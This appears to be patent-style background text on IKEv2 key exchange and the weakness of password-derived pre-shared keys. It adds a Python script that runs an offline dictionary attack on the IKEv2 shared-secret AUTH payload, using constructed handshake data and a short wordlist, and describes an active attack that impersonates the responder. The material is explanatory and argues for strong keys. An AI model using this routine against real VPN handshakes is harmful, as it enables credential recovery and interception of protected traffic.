In present-day communication it is important to secure the messages being exchanged. Because there are many opportunities for interception, eavesdropping and tampering, communicated messages should be protected against such attacks.
A known approach for securing communication is Internet Protocol Security (IPsec). IPsec provides confidentiality, data integrity, access control and data source authentication for IP datagrams sent over various communication channels. These services are provided by maintaining shared state between the source and the sink of an IP datagram. This state defines, among other things, the specific services provided to the datagram, which cryptographic algorithms are used to provide those services, and the keys used as input to the cryptographic algorithms. The Internet Key Exchange (IKE) protocol performs mutual authentication of the two parties and establishes the shared secrets between them.
IKE therefore negotiates the shared secret information and the set of cryptographic algorithms to be used. All communication in this protocol consists of pairs of messages, each pair comprising a request and a response.
When establishing an IKE communication, IKE_SA_INIT messages are exchanged first and IKE_AUTH messages thereafter between an initiator and a responder. In most cases only two IKE_SA_INIT messages and two IKE_AUTH messages, i.e. four messages in total, are needed to establish secure communication.
The IKEv2 protocol is described in detail in C. Kaufman: "Internet Key Exchange (IKEv2) Protocol", IETF IPsec working group, draft-ietf-ipsec-ikev2-10.txt, Aug. 16, 2003.
During initiation of the communication, security parameters are negotiated between initiator and responder: nonces (one-time random numbers), cryptographic parameters and Diffie-Hellman values are exchanged within the IKE_SA_INIT messages. Thereafter, in the IKE_AUTH messages, the identities and proofs of knowledge of the secrets corresponding to the two identities (initiator, responder) are transmitted.
In the current versions of the Internet Key Exchange protocol, the parties authenticate each other using public key certificates or strong pre-shared secret keys. However, such mechanisms are not applicable in situations where only a constrained key management channel is available. This is the case in a personal area network, where a user wants to initialise an ad-hoc security association between two devices by making the devices share a short secret password.
For authentication in IKEv2 the pre-shared key must be a strong shared secret. If the shared key is derived solely from a user-chosen password, the communication might be insecure: user passwords are typically unsuitable as shared secrets, because they are unlikely to have sufficient unpredictability to resist dictionary attacks.
Therefore, communication using the IKEv2 protocol without strong shared secrets might be insecure: the authentication between initiator and responder, as well as the confidentiality and integrity of the messages subsequently sent, may be compromised by an attacker who recovers the password.
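The following Python script is an added example, not part of the original text or of any IKEv2 implementation, illustrating the dictionary attack described above and the IKE_AUTH proof of knowledge that it targets. It models the IKEv2 shared-secret authentication method from RFC 7296, section 2.15, in which the initiator's AUTH payload is prf(prf(Shared Secret, "Key Pad for IKEv2"), InitiatorSignedOctets). The prf is assumed to be HMAC-SHA256, and the handshake transcript, the SK_pi key and the wordlist are constructed stand-ins for captured material. The attack model assumed here is an active one: because IKE_AUTH is encrypted under keys derived from the unauthenticated Diffie-Hellman exchange, a passive eavesdropper cannot read AUTH, but an attacker that answers the initiator's IKE_SA_INIT itself holds SK_pi and the full signed octets, receives the initiator's AUTH first, and can then test password guesses offline without any further contact with the victim.

```python
"""Offline dictionary attack on an IKEv2 shared-secret AUTH payload (added example).

Shared-key authentication (RFC 7296, section 2.15):
    AUTH = prf( prf(Shared Secret, "Key Pad for IKEv2"), <InitiatorSignedOctets> )
The prf choice, transcript bytes, SK_pi value and wordlist below are constructed.
"""
import hashlib
import hmac
import secrets

KEY_PAD = b"Key Pad for IKEv2"   # fixed pad string from RFC 7296, section 2.15


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv2 prf, instantiated here as PRF_HMAC_SHA2_256 (assumed negotiated)."""
    return hmac.new(key, data, hashlib.sha256).digest()


def initiator_signed_octets(real_message1: bytes, nonce_r: bytes,
                            sk_pi: bytes, id_i_payload: bytes) -> bytes:
    """InitiatorSignedOctets = RealMessage1 | NonceRData | MACedIDForI,
    with MACedIDForI = prf(SK_pi, RestOfInitIDPayload)  (RFC 7296, section 2.15)."""
    return real_message1 + nonce_r + prf(sk_pi, id_i_payload)


def psk_auth(shared_secret: bytes, signed_octets: bytes) -> bytes:
    """AUTH payload value for the shared-secret authentication method."""
    return prf(prf(shared_secret, KEY_PAD), signed_octets)


def dictionary_attack(observed_auth: bytes, signed_octets: bytes, wordlist):
    """Offline password search. The attacker acted as responder in the
    handshake, so it knows SK_pi and the complete SignedOctets, and it has
    decrypted the initiator's IKE_AUTH to obtain AUTH. Each guess costs two
    HMAC calls and no further network interaction with the victim."""
    for candidate in wordlist:
        guess = psk_auth(candidate.encode("utf-8"), signed_octets)
        if hmac.compare_digest(guess, observed_auth):
            return candidate
    return None


# Constructed handshake material standing in for a captured exchange.
REAL_MESSAGE1 = b"IKE_SA_INIT request: SAi1 | KEi | Ni (constructed bytes)"
NONCE_R = bytes.fromhex("9f2c7a1e" * 8)      # 32-byte responder nonce (constructed)
SK_PI = hashlib.sha256(b"SK_pi as derived from the DH result (constructed)").digest()
ID_I = b"alice@example.org"                   # rest of the IDi payload (constructed)
WORDLIST = ["password", "letmein", "qwerty", "summer2003", "ikev2", "secret"]


def demo_weak_password():
    """Initiator used a human-chosen password as the IKEv2 shared secret."""
    signed = initiator_signed_octets(REAL_MESSAGE1, NONCE_R, SK_PI, ID_I)
    observed = psk_auth(b"summer2003", signed)
    return dictionary_attack(observed, signed, WORDLIST)   # -> "summer2003"


def demo_strong_key():
    """Same attack against a 256-bit random pre-shared key: the search fails."""
    signed = initiator_signed_octets(REAL_MESSAGE1, NONCE_R, SK_PI, ID_I)
    observed = psk_auth(secrets.token_bytes(32), signed)
    return dictionary_attack(observed, signed, WORDLIST)   # -> None


if __name__ == "__main__":
    print("weak password recovered:", demo_weak_password())
    print("strong key recovered:", demo_strong_key())
```

The two demo functions make the point of the preceding paragraphs concrete: the protocol computation is identical in both runs, and the only difference is the entropy of the shared secret. A password drawn from a wordlist is recovered after a handful of HMAC evaluations, whereas a 256-bit random key is not found because the candidate space cannot be enumerated, which is why IKEv2 requires a strong shared secret rather than a user-memorable password for this authentication method.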